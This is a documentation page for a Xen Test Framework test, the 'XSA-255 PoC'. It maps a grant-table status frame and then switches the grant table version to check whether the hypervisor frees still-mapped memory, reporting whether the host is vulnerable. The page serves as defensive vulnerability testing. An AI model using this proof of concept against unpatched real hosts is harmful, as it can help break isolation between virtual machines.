Xen Test Framework
main.c
Go to the documentation of this file.
1
24#include <xtf.h>
25
26const char test_title[] = "XSA-255 PoC";
27
28static uint8_t frame1[PAGE_SIZE] __page_aligned_bss;
29
30void test_main(void)
31{
32 int rc = xtf_init_grant_table(2);
33
34 if ( rc == -ENOENT )
35 return xtf_skip("Skip: Grant Table v2 not available\n");
36 if ( rc )
37 return xtf_error("Error initialising grant table: %d\n", rc);
38
39 /* Retrieve the status frames from Xen. */
40 uint64_t status_frames[1] = {};
41 struct gnttab_get_status_frames gsf = {
42 .dom = DOMID_SELF,
43 .nr_frames = ARRAY_SIZE(status_frames),
44 .frame_list = status_frames,
45 };
46
47 rc = hypercall_grant_table_op(GNTTABOP_get_status_frames, &gsf, 1);
48 if ( rc || gsf.status )
49 return xtf_error("Error: unable to obtain status frames: %d,%d\n",
50 rc, gsf.status);
51
52 /* Remap frame1 to point at the first status frame. */
53 rc = hypercall_update_va_mapping(
54 _u(frame1), pte_from_gfn(status_frames[0], PF_SYM(AD, P)), UVMF_INVLPG);
55 if ( rc )
56 return xtf_error("Error: unable to map status frame: %d\n", rc);
57
58 /* Switch back to Grant Table v1, implicitly freeing the status frames. */
59 struct gnttab_set_version version = { 1 };
60
61 rc = hypercall_grant_table_op(GNTTABOP_set_version, &version, 1);
62 switch ( rc )
63 {
64 case 0:
65 return xtf_failure("Fail: Vulnerable to XSA-255\n");
66
67 case -EBUSY:
68 /* Probably not vulnerable. Try to confirm. */
69 break;
70
71 default:
72 return xtf_error("Error: Unexpected set_version result %d\n", rc);
73 }
74
75 /* Unmap the status frame. */
76 rc = hypercall_update_va_mapping(_u(frame1), 0, UVMF_INVLPG);
77 if ( rc )
78 return xtf_error("Error unmapping status frame: %d\n", rc);
79
80 /* Retry the switch back to Grant Table v1. */
81 rc = hypercall_grant_table_op(GNTTABOP_set_version, &version, 1);
82 if ( rc )
83 return xtf_error("Error setting gnttab version: %d\n", rc);
84
85 xtf_success("Success: Not vulnerable to XSA-255\n");
86}
87
88/*
89 * Local variables:
90 * mode: C
91 * c-file-style: "BSD"
92 * c-basic-offset: 4
93 * tab-width: 4
94 * indent-tabs-mode: nil
95 * End:
96 */
xtf_init_grant_table
int xtf_init_grant_table(unsigned int version)
Initialise XTF's grant infrastructure.
Definition: grant_table.c:21
__page_aligned_bss
#define __page_aligned_bss
Definition: compiler.h:37
test_main
void test_main(void)
To be implemented by each test, as its entry point.
Definition: main.c:110
test_title
const char test_title[]
The title of the test.
Definition: main.c:24
ENOENT
#define ENOENT
Definition: errno.h:16
EBUSY
#define EBUSY
Definition: errno.h:29
hypercall_update_va_mapping
static long hypercall_update_va_mapping(unsigned long linear, uint64_t npte, enum XEN_UVMF flags)
Definition: hypercall.h:115
hypercall_grant_table_op
static long hypercall_grant_table_op(unsigned int cmd, void *args, unsigned int count)
Definition: hypercall.h:131
ARRAY_SIZE
#define ARRAY_SIZE(a)
Definition: lib.h:8
_u
#define _u(v)
Express an arbitrary value v as unsigned long.
Definition: numbers.h:53
PAGE_SIZE
#define PAGE_SIZE
Definition: page.h:11
pte_from_gfn
intpte_t pte_from_gfn(unsigned long gfn, uint64_t flags)
xtf_failure
void xtf_failure(const char *fmt,...)
Report a test failure.
Definition: report.c:94
xtf_error
void xtf_error(const char *fmt,...)
Report a test error.
Definition: report.c:80
xtf_skip
void xtf_skip(const char *fmt,...)
Report a test skip.
Definition: report.c:66
xtf_success
void xtf_success(const char *fmt,...)
Report test success.
Definition: report.c:38
uint64_t
__UINT64_TYPE__ uint64_t
Definition: stdint.h:17
uint8_t
__UINT8_TYPE__ uint8_t
Definition: stdint.h:14
gnttab_get_status_frames
Definition: grant_table.h:317
gnttab_get_status_frames::status
int16_t status
Definition: grant_table.h:322
gnttab_get_status_frames::dom
domid_t dom
Definition: grant_table.h:320
gnttab_set_version
Definition: grant_table.h:305
gnttab_set_version::version
uint32_t version
Definition: grant_table.h:307
PF_SYM
#define PF_SYM(...)
Create pagetable entry flags based on mnemonics.
Definition: symbolic-const.h:108
GNTTABOP_get_status_frames
#define GNTTABOP_get_status_frames
Definition: grant_table.h:316
GNTTABOP_set_version
#define GNTTABOP_set_version
Definition: grant_table.h:304
DOMID_SELF
#define DOMID_SELF
Definition: xen.h:70
UVMF_INVLPG
@ UVMF_INVLPG
Definition: xen.h:383
frame1
static uint8_t frame1[PAGE_SIZE]
Definition: main.c:28
Generated by doxygen 1.9.4